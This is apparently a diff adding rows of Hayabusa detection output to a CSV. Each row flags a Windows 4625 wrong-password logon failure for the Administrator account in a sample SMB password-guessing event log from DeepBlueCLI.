+2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iEQ6KkZEHGcSgdA8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qzxJYBbM7ZMaaGOo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wO5GFBqSltNfjtQT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PdsMzjfP1ZcPju2i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2LqpKmoCX9slPXie  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ouHvw1LXTN3OSFYb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tZIB1QO7hfugceJg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u4QU2BQ0u5tJsdjG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0P7NKiKCmLvu6L1L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4obkK4RfsLZe5gdi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JRUDpDLhgop8d1el  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LvdsNkFqfFWRePXJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5wvd8c1jYrEZMcKI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AWvECxgkvWdg9Zdc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lHHPOAYSMSp3BhX7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rJicXUMfrx9BOzHI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eybrQWvrvwSkNADJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VVMPCaQB0XteDSwC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lbjjLoATZE6KPIQv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tips954DRcYeIB2T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nLe9aMiMz0akxfWW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: csroGB9KZOZkb5sY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Zl4Rc25RsvJ7Y9H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C5CxqCFOIJBMZCD6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gVPwxpR05F3B5aXp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nP317UkK2DhTD5Rd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ir3c7dqXm1LhbfqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1U1QZiJSrEufxF3b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HZnDnDhTPuC9n5A1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 72gY1ClzwuisAhKW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nrneLGOZCwPIeQgT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dm3gGV2yR4B3yrJi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fzeklLG1KCTE5FpP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uZPwxCw3EWy9NShk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MalB3OcsOsRaMtS3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XMZMqCYPHO3n4RIh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I1VUeIuU1rQPISNA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: md4ioB8wNiaz2EKB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nM8QaFeqwDfJZ1gc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlR75rMhpLnfQZbC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WF8BcOe4YUDYTXkj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FK0Iiao20PyPmtTk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kQbCbAHrQilFmMZP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VUdXQOw98VVoksDM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fISqpC8eKlaQGabv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s5Y0VryMAHjtB3n2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bsjAHlztFIC8tBt0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CiEQlAlTOhqOKpmy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i7lUqZMROQXNUtQm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0eFCGEtOLzjUxI5v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CqfOAGcVcwSgaeo3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2hcqVJzkVgvUnebk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q9ZpqiTGXqJlAQTZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qCzXKlJ2vPeqqdfa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tITW0ihpErFk3nKp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MdQqr1T4frPNlulf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: niiXRpP5AVHpG9Hu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EThR98jZUdwNxbXQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NBsJcIw859FfEkLD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kG4Tv5vauSWhbj8F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 453tjgRGMu46vC33  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1fnzhhfszxJWxLCT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dWPkeL8TnAbC1nSV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JrDmUzyK4Xxx6Jn1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bMTf9D2yjumfS9LM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8cCs65ithseTCORa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QBrGAScjpAdScGmJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n90F99qBpmUUVLId  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MLeOkIG0hVHIOnN7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vVx5uUtkaFIf7PWZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kgd7lCQUQ3dHN18S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b8m2MmpFVK9Uojp7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
